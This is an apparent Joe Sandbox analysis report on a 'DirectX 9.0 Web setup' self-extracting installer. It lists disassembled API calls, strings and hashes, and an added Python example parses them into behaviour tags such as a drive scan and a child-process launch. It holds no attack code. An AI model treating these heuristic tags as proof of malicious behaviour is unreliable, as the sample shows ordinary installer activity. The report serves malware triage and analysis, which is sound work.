                                                                                                • Opcode Fuzzy Hash: 7272f09d9cc4f95465a0350aed80e63b7b027015254899d99047417d38069267
                                                                                                • Instruction Fuzzy Hash: 1351A0B1A00209BEFB23DB64CC85EFE7B6CAB08344F0044A5B7C5E60C5D6759E858B64

                                                                                                Control-flow Graph (graph image not reproduced)
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01004B50
                                                                                                • GetSystemInfo.KERNEL32(?), ref: 01004B63
                                                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01004BB0
                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01004BC2
                                                                                                  • Part of subcall function 01002F7A: wsprintfA.USER32 ref: 01002F9A
                                                                                                  • Part of subcall function 01002F7A: lstrcpyA.KERNEL32(?,?), ref: 01002FAC
                                                                                                  • Part of subcall function 01002F7A: RemoveDirectoryA.KERNELBASE(?,?,?), ref: 01002FBE
                                                                                                  • Part of subcall function 01002F7A: GetFileAttributesA.KERNELBASE(?), ref: 01002FC5
                                                                                                  • Part of subcall function 01002F7A: GetTempFileNameA.KERNEL32(?,IXP,00000000,?), ref: 01002FED
                                                                                                  • Part of subcall function 01002F7A: DeleteFileA.KERNEL32(?), ref: 01002FFB
                                                                                                  • Part of subcall function 01002F7A: CreateDirectoryA.KERNEL32(?,00000000), ref: 01003004
                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01004C0A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$Filelstrcpy$CreateRemove$AttributesDeleteInfoNameSystemTempwsprintf
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                • API String ID: 2618030033-3703068183
                                                                                                • Opcode ID: d5e147964fd9a8698458917d450e8c8beedf36294136644907e6467125a92c41
                                                                                                • Instruction ID: 863f2b1f4f4a5febeb1d47ca0d15cb2489539e343ca057a3309e34f4a0df478a
                                                                                                • Opcode Fuzzy Hash: d5e147964fd9a8698458917d450e8c8beedf36294136644907e6467125a92c41
                                                                                                • Instruction Fuzzy Hash: 5421A131505B19ABFB639F699C44FEA3ADCAB05385F4000A9F7C5E10C4DB39C941CB69
                                                                                                APIs
                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 01005E90
                                                                                                • MulDiv.KERNEL32(00000000,00000000,00000400), ref: 01005EAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpace
                                                                                                • String ID:
                                                                                                • API String ID: 1705453755-0
                                                                                                • Opcode ID: 81f4c4850e346c9080ac81259ce3d45f8a1d835a9eef6e91ffedc07ec51b2c28
                                                                                                • Instruction ID: 8a5b4a76b2f8f35f795143fc95d6367980ae63d8bc1465d256248162a8adc07a
                                                                                                • Opcode Fuzzy Hash: 81f4c4850e346c9080ac81259ce3d45f8a1d835a9eef6e91ffedc07ec51b2c28
                                                                                                • Instruction Fuzzy Hash: C3F0E776D01218BFEF05DF94C844BEEBBBCEF14316F008496AA51A6180D775AB04CF90

                                                                                                Control-flow Graph (graph image not reproduced)
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,0100BAA2,?,00000000), ref: 0100540C
                                                                                                • lstrcmpiA.KERNEL32(?,<None>), ref: 010053AF
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • lstrcmpiA.KERNEL32(?,<None>), ref: 0100544C
                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010054DA
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 01005575
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 01005594
                                                                                                • LocalFree.KERNEL32(?,00000000,000004C7,00000000,00000000,00000010,00000000,?,?,?,?,00000000), ref: 010055D0
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000004C9,DoInfInstall,00000000,00000010,00000000,?,00000000), ref: 0100560C
                                                                                                • LocalFree.KERNEL32(?,00000000,000004C8,advpack.dll,00000000,00000010,00000000,advpack.dll,?,?,?,?,00000000), ref: 01005615
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 01005626
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0100562F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$Resource$Local$Library$Findlstrcmpi$AddressLoadLockProcSizeoflstrcpy
                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DirectX 9.0 Web setup$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll
                                                                                                • API String ID: 770626793-3658801068
                                                                                                • Opcode ID: 9bf6c9ac14c3ca6bcf4a5ac89318c0245a048f76e75a5681400d6749ac64c027
                                                                                                • Instruction ID: 2f43a83221f47182914e3832709c3c8ca3f90824a361c088b79cbbea01e2dab8
                                                                                                • Opcode Fuzzy Hash: 9bf6c9ac14c3ca6bcf4a5ac89318c0245a048f76e75a5681400d6749ac64c027
                                                                                                • Instruction Fuzzy Hash: ACA1C070A003499BFF23DF65CC85AEE3BA9AB05305F00416AFAC5960D1DBB68984CF24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                 [Control-flow graph node dump not reproduced. Function 0x1005636-0x10058fd. API calls in graph: LocalAlloc, LocalFree, lstrcmpA, GetTempPathA, lstrcpyA, GetDriveTypeA, GetFileAttributesA, GetWindowsDirectoryA, SetFileAttributesA. Subroutine calls: 0x1002a34, 0x10038cc, 0x1003547, 0x1004161, 0x1004b1a, 0x1001f6e, 0x1003f0d, 0x1005e13, 0x1005b32, 0x1001f4b.]
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,RUNPROGRAM,00000000,00000000,?,00000000), ref: 01005659
                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056BD
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 010056D1
                                                                                                • LocalFree.KERNEL32(00000000,00000000,000004B1,00000000,00000000,00000010,00000000,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056A5
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01005740
                                                                                                • lstrcpyA.KERNEL32(?,A:\,?,00000000), ref: 01005786
                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,00000000), ref: 0100578E
                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,00000000), ref: 010057A7
                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,00000000,?,00000000), ref: 010058B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Local$ErrorFindFreeLast$AllocAttributesDirectoryDriveFileLoadLockMessagePathSizeofTempTypeWindowslstrcmplstrcpy
                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                • API String ID: 535033332-559629209
                                                                                                • Opcode ID: 6850fc883a11cab837c26050fb0a112f3f6a7a0a4a41dfd58cf56b6d104f570a
                                                                                                • Instruction ID: 096894b9e67c34d8375bb897499805253a01f20e87239c6fdf17a2f350f7322a
                                                                                                • Opcode Fuzzy Hash: 6850fc883a11cab837c26050fb0a112f3f6a7a0a4a41dfd58cf56b6d104f570a
                                                                                                • Instruction Fuzzy Hash: B661AAB4A40355BAFB3397755D89FEB26ACAB19744F400491FBC9E60C1E6B4C6808F64
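The per-function API lists above carry the evidence behind the report's behaviour flags in their argument columns: the `A:\` template handed to lstrcpyA together with GetDriveTypeA (whose recorded slot `0000005A` is the byte 'Z' that also appears in the function's string list) is a drive-letter sweep, GetTempPathA with `C:\Users\user\AppData\Local\Temp\IXP000.TMP\` is the staging directory, FindResourceA with type `0000000A` (RT_RCDATA) is the lookup of the RUNPROGRAM-style directives, GetProcAddress with `DoInfInstall` is the runtime import from advpack.dll, and CreateProcessA/WaitForSingleObject/GetExitCodeProcess is the awaited child process. The following Python is an added example, not Joe Sandbox output or the sample's code: it parses lines in the exact format printed on this page and turns them into those behaviour tags. The sample lines are copied from this report; the tag names, the rule set and the reading of the `0000005A` slot as a loop-bound hint are the example's own.

```python
# Added example: parse the 'APIs' lines of a Joe Sandbox function entry and tag behaviours.
# Input format as on this page: '• Api.MODULE(arg,...), ref: ADDR', optionally
# prefixed with 'Part of subcall function ADDR:'. Tag names are this example's own.
import re
from typing import List, NamedTuple, Optional, Set

class ApiCall(NamedTuple):
    api: str                   # e.g. "GetDriveTypeA"
    module: str                # e.g. "KERNEL32"
    args: List[str]            # stack slots as printed, left to right
    ref: Optional[int]         # call-site address, None when not printed
    subcall_of: Optional[int]  # parent function for "Part of subcall" lines

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
RT_RCDATA = 10                           # resource type printed as 0000000A
DRIVE_RE = re.compile(r"^[A-Za-z]:\\$")  # 'A:\' drive-root template

def parse_api_line(line: str) -> Optional[ApiCall]:
    """One report line -> ApiCall, or None for headings and other text."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return ApiCall(
        api=m.group("api"),
        module=m.group("mod"),
        args=[a.strip() for a in raw.split(",")] if raw else [],
        ref=int(m.group("ref"), 16) if m.group("ref") else None,
        subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
    )

def parse_api_block(text: str) -> List[ApiCall]:
    """Parse a whole 'APIs' section; lines that are not API calls are skipped."""
    return [c for c in map(parse_api_line, text.splitlines()) if c]

def _hex_arg(value: str) -> Optional[int]:
    """Joe prints numeric slots as 8 hex digits; '?' and string slots are not numbers."""
    return int(value, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", value) else None

def tag_behaviours(calls: List[ApiCall]) -> Set[str]:
    """API and argument evidence of one function -> behaviour tags."""
    apis = {c.api for c in calls}
    strings = {a for c in calls for a in c.args}
    tags: Set[str] = set()
    if "GetDriveTypeA" in apis and any(DRIVE_RE.match(s) for s in strings):
        tags.add("drive-letter scan")                  # 'A:\' template + GetDriveTypeA
    if "GetTempPathA" in apis:
        tags.add("temp staging directory")             # %TEMP%\IXP000.TMP staging
    if any(c.api == "FindResourceA" and len(c.args) >= 3
           and _hex_arg(c.args[2]) == RT_RCDATA for c in calls):
        tags.add("resource directive lookup (RT_RCDATA)")
    if any(c.api == "GetProcAddress" and "DoInfInstall" in c.args for c in calls):
        tags.add("runtime import of advpack!DoInfInstall")
    if {"CreateProcessA", "WaitForSingleObject", "GetExitCodeProcess"} <= apis:
        tags.add("child process launched and awaited")
    return tags

def drive_letter_hint(calls: List[ApiCall]) -> Optional[str]:
    """First GetDriveTypeA slot read as a drive letter (0000005A -> 'Z'). This is a
    stack snapshot, so it is a hint about the loop bound rather than proof."""
    for c in calls:
        v = _hex_arg(c.args[0]) if c.api == "GetDriveTypeA" and c.args else None
        if v is not None and ord("A") <= v <= ord("Z"):
            return chr(v)
    return None

# Lines copied from the API lists of three functions in this report.
SAMPLE_DRIVE_SCAN = r"""
  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
• LocalAlloc.KERNEL32(00000040,00000001,RUNPROGRAM,00000000,00000000,?,00000000), ref: 01005659
• lstrcmpA.KERNEL32(00000000,<None>,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056BD
  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01005740
• lstrcpyA.KERNEL32(?,A:\,?,00000000), ref: 01005786
• GetDriveTypeA.KERNEL32(0000005A,?,00000000), ref: 0100578E
"""
SAMPLE_INF_INSTALL = r"""
• lstrcmpiA.KERNEL32(?,<None>), ref: 010053AF
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010054DA
• FreeLibrary.KERNEL32(00000000,00000000,000004C9,DoInfInstall,00000000,00000010,00000000,?,00000000), ref: 0100560C
"""
SAMPLE_RUN_PROGRAM = r"""
• CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?,00000001,7591F530,00000000), ref: 01004595
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 010045A4
• GetExitCodeProcess.KERNEL32(?,?), ref: 010045B1
"""

if __name__ == "__main__":
    for name, text in {"drive scan": SAMPLE_DRIVE_SCAN, "INF install": SAMPLE_INF_INSTALL,
                       "run program": SAMPLE_RUN_PROGRAM}.items():
        print(f"{name}: {sorted(tag_behaviours(parse_api_block(text)))}")
```

Feed it a whole "APIs" section pasted from the report; headings such as "Memory Dump Source" do not match the line pattern and are dropped. The rules key on argument values deliberately: the API names alone (LocalFree, lstrcpyA) are generic, and it is the literals Joe recovered from the stack that distinguish a drive sweep from ordinary string handling.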

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 01002F9A
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 01002FAC
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,?), ref: 01002FBE
                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 01002FC5
                                                                                                • GetTempFileNameA.KERNEL32(?,IXP,00000000,?), ref: 01002FED
                                                                                                • DeleteFileA.KERNEL32(?), ref: 01002FFB
                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 01003004
                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 01003019
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryFile$Createlstrcpy$AttributesCharDeleteNamePrevRemoveTemplstrlenwsprintf
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                • API String ID: 3224660439-2659685179
                                                                                                • Opcode ID: cc23fafd31c200b07fe8fdd91d20a1ba6cd3f4739df2429ec796210adebc7534
                                                                                                • Instruction ID: e7c67a7043ec5c6bac1d4f2c1b8a734ea561e127a1ee01801807ea9209cd36ee
                                                                                                • Opcode Fuzzy Hash: cc23fafd31c200b07fe8fdd91d20a1ba6cd3f4739df2429ec796210adebc7534
                                                                                                • Instruction Fuzzy Hash: A311E1312092496FE373AB65EC48FEB3BACEF46351F000129F6C5D1084DEBA950587A6

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003E68
                                                                                                • LocalAlloc.KERNEL32(00000040,-00000014,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003E74
                                                                                                • lstrcpyA.KERNEL32(00000000,01004BBC,759183C0,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003EA3
                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,00000000,TMP4351$.TMP,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003EC4
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003ECD
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003ED9
                                                                                                • GetFileAttributesA.KERNELBASE(01004BBC,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003EE0
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Strings
                                                                                                • TMP4351$.TMP, xrefs: 01003EA9
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003E66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastLocal$AllocAttributesCloseCreateFreeHandleMessagelstrcpylstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                • API String ID: 3688570051-3104274291
                                                                                                • Opcode ID: cec466b1454d8152f2b6b7027edac8848f359d804bd141f2f042a694d3e2b742
                                                                                                • Instruction ID: 07e8854d2f4717a7fcec1bdd87890a29ac9275318df03397e391de66aed45773
                                                                                                • Opcode Fuzzy Hash: cec466b1454d8152f2b6b7027edac8848f359d804bd141f2f042a694d3e2b742
                                                                                                • Instruction Fuzzy Hash: 9A11A5726016447FE223AF799C49F9F3E5CEB06369F014514F2D6E90C5C7BA94418B74

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                 [Control-flow graph node dump not reproduced. Function 0x10049db-0x1004b19. API calls in graph: GetDlgItem, ShowWindow, FreeResource, SendMessageA. Subroutine calls: 0x1002e6f, 0x1003c60, 0x1005ebf, 0x1006e88, 0x10038cc, 0x10069c2.]
                                                                                                APIs
                                                                                                  • Part of subcall function 01002E6F: FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01002E89
                                                                                                  • Part of subcall function 01002E6F: LoadResource.KERNEL32(00000000,00000000,?,010059A0), ref: 01002E92
                                                                                                  • Part of subcall function 01002E6F: LockResource.KERNEL32(00000000,?,010059A0), ref: 01002E99
                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 01004A00
                                                                                                • ShowWindow.USER32(00000000,?,00000000,00000001,0100525B,?,010059A0), ref: 01004A09
                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 01004A18
                                                                                                • ShowWindow.USER32(00000000,?,00000000,00000001,0100525B,?,010059A0), ref: 01004A1B
                                                                                                • FreeResource.KERNEL32(00000000,-00000514,00000000,00000000,00000010,00000000,?,?,?,00000000,00000001,0100525B,?,010059A0), ref: 01004AC7
                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,-00000514), ref: 01004B0E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$ItemShowWindow$FindFreeLoadLockMessageSend
                                                                                                • String ID: *MEMCAB
                                                                                                • API String ID: 3694369891-3211172518
                                                                                                • Opcode ID: c58f8bc2a7f7b26109adb1d35207193ebaf4e78ef12d8e4ecae876ef37705db9
                                                                                                • Instruction ID: 5c6169ab3c9c94f66ae9421972872bc9d1b968acd00de396031396c823d54b5c
                                                                                                • Opcode Fuzzy Hash: c58f8bc2a7f7b26109adb1d35207193ebaf4e78ef12d8e4ecae876ef37705db9
                                                                                                • Instruction Fuzzy Hash: 3E31EA313813117AF63367579C89F972D8DDB56B65F400454F7C8E60C6C6FA889087A9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                 [Control-flow graph node dump not reproduced. Function 0x1004560-0x1004654. API calls in graph: CreateProcessA, WaitForSingleObject, GetExitCodeProcess, CloseHandle (twice), GetLastError, FormatMessageA. Subroutine calls: 0x1003547, 0x10038cc, 0x10028fa.]
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?,00000001,7591F530,00000000), ref: 01004595
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010045A4
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 010045B1
                                                                                                • CloseHandle.KERNEL32(?,?), ref: 010045F2
                                                                                                • CloseHandle.KERNEL32(?), ref: 010045F7
                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01004621
                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 0100462E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 3183975587-0

                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000,01005A22,00000000,01005ACB,?,?), ref: 01003DB5
                                                                                                • LocalFree.KERNEL32(00000000,00000000,000004B1,00000000,00000000,00000010,00000000,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000), ref: 01003DFA
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Similarity
                                                                                                • API ID: Resource$ErrorFindLastLocal$AllocFreeLoadLockMessageSizeof
                                                                                                • String ID: <None>$UPROMPT
                                                                                                • API String ID: 226386726-2980973527

                                                                                                APIs
